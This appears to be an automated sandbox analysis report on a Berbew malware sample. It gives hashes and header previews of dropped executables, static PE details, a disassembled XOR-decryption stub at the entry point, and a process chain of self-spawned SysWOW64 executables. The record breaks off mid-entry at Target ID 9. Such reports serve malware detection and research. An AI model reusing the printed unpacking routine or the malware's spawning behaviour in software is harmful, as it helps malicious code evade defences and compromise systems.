                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Oeanchcn.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8856460154820622
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10sB+BDq9J5SV3DY:CSVVEPozmB7CB+FqX5S1D
                          MD5:D96A5EAAFB573C44F2B7DF9DA7CA8EFD
                          SHA1:9D97EC65EBEA15170EAC95FEA82C95C1A74734DA
                          SHA-256:C71673677F8F8018E618E7AA6221C3FDA9298AB07E3B16528901644DEA541A1B
                          SHA-512:6E430E275F1C2135BDE8CBF9E9FC1820CF5BDE5DD5B7D337723CDD8966BC4078429A8841D9A51831B10B75BE525F9571E34A0A4B62431C87F4532C30DF8EE216
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Bgamkfnl.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.8861415031675
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU10ZeB+BDq9J5SV3DY:CSVVEPozmB7beB+FqX5S1D
                          MD5:450995A555635B8455333D74D6525ADD
                          SHA1:1D8ECC3CE389291A7B994B1BE0C01591E47481D3
                          SHA-256:475AD260D5D1FAB50E98BD29D6117ECF261DAD03DDFB3DFEDE6F56EFB9BBF9B3
                          SHA-512:A83621AA8D25C5EDB4FD4F83102EAE81C33C3104F00EC321F93CBB02405F46B683D3106C094BFCE89F938300F6252147712AD3A52BA379A2487F5B4B153BE63C
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Dfcboo32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.885743139619248
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU104B+BDq9J5SV3DY:CSVVEPozmB72B+FqX5S1D
                          MD5:68CDDAA046789A220AB319DD3732F89D
                          SHA1:E5751FDE9E7D6FFD692CF3A3E41F83A4504658AC
                          SHA-256:C2C071E5FED607D815D3CD0ACD2C6F77D3008C55EA874FECE02172892DBB5AB9
                          SHA-512:E6F2A329A6BAE7F39B742382DC7041204D7036B5E4226CCAAEA4FBBE4BFAC1B6B05E73518D9FF02A35FC05ED6CE58D34C4B347A2798EDA35623FE809900245C3
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Bnpnbp32.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):6657
                          Entropy (8bit):2.886282171567183
                          Encrypted:false
                          SSDEEP:48:6EQt5YVOSVVEPy+wEMmqiHNpU101B+BDq9J5SV3DY:CSVVEPozmB73B+FqX5S1D
                          MD5:57D08F5E5CCC8794CAE1728B07F0ED12
                          SHA1:67B5CCB3B8914517B2067CA22891CAC8141653D1
                          SHA-256:98FC1574783A5D4F0A8C10B99836B4E5E9F66E96EFD69343CED116E851E7EEE2
                          SHA-512:6A56A4744296C0A6F71DF43C82629E5B0D1953B807CD8BBCB1C3C8BE37C956556B04C3EA0802F5C2E55F203A931F65362D3EA050D200E10D9BB1C892B9C77377
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.@...........!...7.....................0...............................p.......................................`..T....@..l............................P....... ..T............................................................................text............................... ..`.rdata..T.... ..T................... ..@.data........0......................@....idata..l....@..l...................`....reloc.......P...................... ....edata..T....`..T................... ..@................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\Ppllkpoo.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.01978092876152
                          Encrypted:false
                          SSDEEP:3072:sOkE0AeYCREXdXNKT1ntPG9poDrFDHZtOgl:shXCN9Otopg5tTl
                          MD5:40D460D476E3EF9238CDEC233DCA293E
                          SHA1:F1D4CE681428A459ADF684C69A77301640E350D0
                          SHA-256:6B750A21921DB2C98DE4D96C09409A1D4E08F7BC4B49D7A055253419B2E0435A
                          SHA-512:152B05BED920F82597E04492CBDDDED2C47E339723F5704AA0B530FA1828AC7BC7A1A038815443013EAB68FC0D4BE28718921FA969433366E3705F08741923BC
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Plbmqa32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):6.979986351954796
                          Encrypted:false
                          SSDEEP:3072:MQ6ZC4b3es7nl6cmJFlCREXdXNKT1ntPG9poDrFDHZtOgl:M9JLesRAJFQCN9Otopg5tTl
                          MD5:746D9DB8F43CEAFB79CE4693732F31F4
                          SHA1:A7D450C3CB3A96D42EF5CE09BFB551F423831449
                          SHA-256:9E86F5A3DACC77FF9C9B6BAC7EF39E39C2B6965FC631A119CFABB26C08A12BA1
                          SHA-512:41689B5FA96AD7D85ECE674CC77F9C9D6CF146E016445002EE3F953EEA86324B5B3629EEF3726EF2676A1F4E2882A5EFEE68B04F027F30B2053D9A2BFA2EF9BD
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Ojacofgb.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.037012142885527
                          Encrypted:false
                          SSDEEP:3072:ssCTAGKyCREXdXNKT1ntPG9poDrFDHZtOgl:sJKRCN9Otopg5tTl
                          MD5:38F64F662EE5C7E45202627AA7FCACCC
                          SHA1:536174057D893B4FC7607807874AB8979303F41D
                          SHA-256:635387B9B65BB9EB8CDBF145FCBBC0398EA084DB81A767A3F773AF5ACDCD578C
                          SHA-512:BAB80AB57E44242778D3E779D696025E0D97CFE17DCA634AACE9CFB8057EBBC1A083E3BC0E8B13E705B3C7638AE05CBD93CF7E3CA7C4E8272F05D160D50A5987
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Plgflqpn.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.015742388700205
                          Encrypted:false
                          SSDEEP:3072:rE5fM7xnCREXdXNKT1ntPG9poDrFDHZtOgl:LCCN9Otopg5tTl
                          MD5:A195A0011B7154E41E7FCDE5D8B4E0CA
                          SHA1:61E015E46AAC8CEFC1FF9CE947785403FFB1DFD2
                          SHA-256:B135EA1A9426364B521AFA9D419BB823DD716BA6F3BF255AA2634ACD78DA3FB2
                          SHA-512:7DE018F4576CD66E301742DB965A4C8B2943BDDE02406AC079333442B0DE553CB0D19BCD8FA1AC32AD75E77A7E34AFBD2BB1EBF674C2ABE9E0B3C51FD73C6245
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          Process:C:\Windows\SysWOW64\Pqeoao32.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):7.013558527102182
                          Encrypted:false
                          SSDEEP:3072:1YqlBq3SyVilCFCREXdXNKT1ntPG9poDrFDHZtOgl:1NySCwCN9Otopg5tTl
                          MD5:B46EDD174CAE8D3583851F8A26241E40
                          SHA1:8EFC1BC566B2CFF72ED4712BE9A06834D945AA17
                          SHA-256:BA14062931917EF30294A526366AE179B975361A256675B9B244876CCCBE2B24
                          SHA-512:AED874B82A3857F73790FF5E0A613594E46B374FCF7DD7725B0114631EBA96E936BC0E1833FD31D00066F463E1DBC33E4D5299F94302A80685D100465E5258DC
                          Malicious:true
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@..................................................................................................................................................................................................text....n.......n.................. ....data....................................data...p-......p-...t..............@....idata..h.......h...................`....embm............................... ..`.rsrc.... ..........................@..@.idata..............................@..@.idata....... ......................@..@.data........0......................@..B.text........@......................@..@.idata.......P......................@..@.data.... ...`...................... ..`.rdata...0.......&..................@..B.idata...............4..............@..@.idata...............6..............@..@.text.... ...........8..
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):6.990103695539264
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • VXD Driver (31/22) 0.00%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:h879iieoae.exe
                          File size:131'072 bytes
                          MD5:b6ff4e20e2b53b684a7cb84630d836fa
                          SHA1:58f690a95f195f70e6fc59ce67855941bd817f7a
                          SHA256:55f3f17f1a264e2b9a8aa9d5750696688fc4a7bbd530ab74224db9939c974d09
                          SHA512:bf58689e3a5787eef3f39538af6131f6bcc25375ef7d9e6f7126a6b083a40be6c0f5c8984e0c0e7344264beefc139f1ef4cf0cbb0e834892d2e67229c99b393d
                          SSDEEP:3072:3j4B2SHQ2wmiWCgTaCREXdXNKT1ntPG9poDrFDHZtOgl:z4MgJwu/ZCN9Otopg5tTl
                          TLSH:84D37CCB67AB2761C253C1721ACF46E2A639B3E52F6C796063F44018036FE1951B3AD3
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xZ...............7.p...>....................@........................................................................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x42e000
                          Entrypoint Section:.embm
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          DLL Characteristics:
                          Time Stamp:0x5A78A2A7 [Mon Feb 5 18:29:59 2018 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:1
                          OS Version Minor:0
                          File Version Major:1
                          File Version Minor:0
                          Subsystem Version Major:1
                          Subsystem Version Minor:0
                          Import Hash:3485b7bb99be46d64b23612faba98357
                          Instruction
                          nop
                          nop
                          nop
                          nop
                          nop
                          pushad
                          call 00007FA1F942F806h
                          nop
                          nop
                          nop
                          nop
                          nop
                          pop eax
                          add eax, 00403AC5h
                          nop
                          nop
                          sub eax, 00403A6Bh
                          nop
                          nop
                          nop
                          nop
                          mov ebx, dword ptr [eax]
                          mov ecx, dword ptr [eax+04h]
                          nop
                          nop
                          nop
                          mov edx, dword ptr [eax+08h]
                          nop
                          nop
                          nop
                          xor dword ptr [ebx], edx
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          add ebx, 04h
                          nop
                          cmp ebx, ecx
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          jl 00007FA1F942F7EAh
                          nop
                          add eax, 0Ch
                          nop
                          nop
                          nop
                          cmp dword ptr [eax], 00000000h
                          nop
                          nop
                          nop
                          jne 00007FA1F942F7C9h
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          popad
                          nop
                          nop
                          jmp 00007FA1F94029B9h
                          add byte ptr [eax], dl
                          inc eax
                          add al, bh
                          jle 00007FA1F942F842h
                          add byte ptr [eax+00003B76h], bl
                          mov al, byte ptr [CD700042h]
                          inc edx
                          add byte ptr [edx+ebx*2+00002DFBh], ch
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          nop
                          nop
                          nop
                          mov ecx, ebx
                          nop
                          nop
                          nop
                          sub ecx, eax
                          nop
                          nop
                          nop
                          xor edx, edx
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          push eax
                          nop
                          nop
                          mov eax, ecx
                          nop
                          nop
                          nop
                          div edi
                          nop
                          nop
                          nop
                          nop
                          nop
                          xchg eax, ecx
                          nop
                          nop
                          nop
                          pop eax
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          mov esi, 05F33C26h
                          nop
                          nop
                          nop
                          nop
                          xor dword ptr [eax], esi
                          add eax, edi
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c000 | 0x118 | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x6ef8 | 0x6ef8 | 1ed61149f456a49c3765939a69af4fdb | False | 0.6444663475077443 | data | 7.190507132248476 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .data | 0x8000 | 0x21298 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .data | 0x2a000 | 0x2d70 | 0x2d70 | 38e6b0b7b6588e0cb16762e2280c898d | False | 0.41755502063273725 | data | 5.726258020923482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0x2d000 | 0xe68 | 0xe68 | 02e8785c395f6589c1765f361cd99074 | False | 0.39398047722342733 | data | 5.075876252835949 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .embm | 0x2e000 | 0x1000 | 0x200 | 83b0eaba5abe73085ef891c71bb1ce50 | False | 0.318359375 | data | 2.369404689922198 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc | 0x2f000 | 0x2000 | 0x1a00 | 96b79b031fcc987bb0c27baf92db9012 | False | 0.494140625 | data | 5.036907313519617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata | 0x31000 | 0x1000 | 0x200 | cf1b514888fa9c2e84873729046b3ef9 | False | 0.400390625 | data | 2.5395793360531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata | 0x32000 | 0x1000 | 0x200 | 65fdd01c2b481c1fb7e2673ac91be88d | False | 0.412109375 | data | 2.6695589518608314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x33000 | 0x1000 | 0xe00 | cca50c934d91d5f84317bf02c25c7d4d | False | 0.5655691964285714 | data | 5.20190474867528 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .text | 0x34000 | 0x1000 | 0xe00 | 4bf27c9996656745afffb0e19f4e2adf | False | 0.5382254464285714 | data | 5.1612474383207205 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata | 0x35000 | 0x1000 | 0x400 | 837cb8e90dc41230c3543c60561e5a4d | False | 0.4248046875 | data | 3.582369291213418 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x36000 | 0x2000 | 0x1a00 | 35e3bc77a50749d9bcd00baccd20b0de | False | 0.49173677884615385 | data | 4.955758251079454 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata | 0x38000 | 0x3000 | 0x2600 | 979b0ab00475a6cd052b7905ae584c09 | False | 0.4276315789473684 | data | 4.769958518554453 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .idata | 0x3b000 | 0x1000 | 0x200 | 60134637a9a41621b00fa141ff81c7fa | False | 0.4765625 | data | 3.3650250421312915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata | 0x3c000 | 0x1000 | 0x200 | a88f6d241d49fd225bf10d219f204e06 | False | 0.4375 | data | 2.793576955047795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .text | 0x3d000 | 0x2000 | 0x1800 | aba1b2f0115bb3713dc7c5b0cdbc0664 | False | 0.5017903645833334 | data | 5.034292397049128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          DLL | Import
                          ole32.DLL | CoCreateInstance, CLSIDFromString, CoInitialize, CoUninitialize
                          OLEAUT32.DLL | SysAllocString
                          WININET.DLL | DeleteUrlCacheEntry, FindFirstUrlCacheEntryA, FindNextUrlCacheEntryA
                          KERNEL32.DLL | ExitProcess, ExpandEnvironmentStringsA, GetCommandLineA, GetCurrentProcessId, GetCurrentThreadId, GetExitCodeThread, GetFileSize, GetModuleFileNameA, GetModuleHandleA, CloseHandle, GetProcAddress, GetSystemDirectoryA, GetTempPathA, GetTickCount, GetVersion, GetVersionExA, GetWindowsDirectoryA, GlobalMemoryStatus, CopyFileA, InterlockedIncrement, IsBadReadPtr, IsBadWritePtr, LoadLibraryA, LocalAlloc, LocalFree, OpenMutexA, CreateFileA, ReadFile, RtlUnwind, SetFilePointer, CreateMutexA, Sleep, TerminateProcess, VirtualQuery, CreateProcessA, WaitForSingleObject, WideCharToMultiByte, WinExec, WriteFile, lstrlenA, lstrlenW, CreateThread, DeleteFileA
                          USER32.DLL | GetWindowTextA, GetWindowRect, FindWindowA, GetWindow, GetClassNameA, SetFocus, GetForegroundWindow, LoadCursorA, LoadIconA, SetTimer, RegisterClassA, MessageBoxA, GetMessageA, GetWindowLongA, SetWindowLongA, CreateDesktopA, SetThreadDesktop, GetThreadDesktop, TranslateMessage, DispatchMessageA, SendMessageA, PostQuitMessage, ShowWindow, CreateWindowExA, DestroyWindow, MoveWindow, DefWindowProcA, CallWindowProcA
                          GDI32.DLL | GetStockObject, SetBkColor, SetTextColor, CreateBrushIndirect, CreateFontA
                          ADVAPI32.DLL | RegCreateKeyExA, RegCloseKey, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, GetSecurityInfo, SetSecurityInfo, SetEntriesInAclA
                          CRTDLL.DLL | __GetMainArgs, _sleep, _stricmp, atoi, exit, memcpy, memset, printf, raise, rand, signal, sprintf, srand, sscanf, strcat, strchr, strncmp, vsprintf
                          oleaut32.dll | SysAllocString
                          ntdsapi.dll | DsBindA, DsBindWithCredA
                          kernel32.dll | lstrcpyW, FatalAppExitA, VirtualAlloc, GetEnvironmentStringsW, GetTimeFormatA, GetVolumeInformationA, CreateProcessW, FreeConsole, CreateFileMappingW, QueryPerformanceCounter, GetTempPathW, GetSystemTimeAsFileTime, SetPriorityClass, GetLongPathNameW, GetProfileIntA, GetTimeFormatW, DeleteFileA, IsBadReadPtr, SuspendThread, FileTimeToSystemTime, GetCurrentProcess
                          version.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                          dbghelp.dll | SymSetOptions
                          No network behavior found

                          Target ID:0
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Users\user\Desktop\h879iieoae.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\h879iieoae.exe"
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B6FF4E20E2B53B684A7CB84630D836FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Nejhbi32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Nejhbi32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:0603E4CBD8760D07DD7DCAB05A92238A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ogjdllpi.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ogjdllpi.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B9761DC0E2D962AEFE92F6E1F3C1F250
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Opbieagi.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Opbieagi.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:04F64BB1853F025B09D78A47FA5C7F7B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:4
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Oglabl32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Oglabl32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:EB5F811B6A66908B38FB889817D5988F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:5
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Olijjb32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Olijjb32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:6E56FF877D11D4ED11AF106FBDDD4ACE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:6
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Oeanchcn.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Oeanchcn.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1B2425A45E8ED6237FBE4E56F276A504
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:7
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Oceoll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Oceoll32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1DB24B47BF090833A70E0BEA68A38D9F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:8
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Onkcje32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Onkcje32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:7862075539A938767C526CCB7DF7CF4E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Odekfoij.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Odekfoij.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:A30DE8FF39A8563F2D7B9E36AD05A4C6
                          Has elevated privileges:true
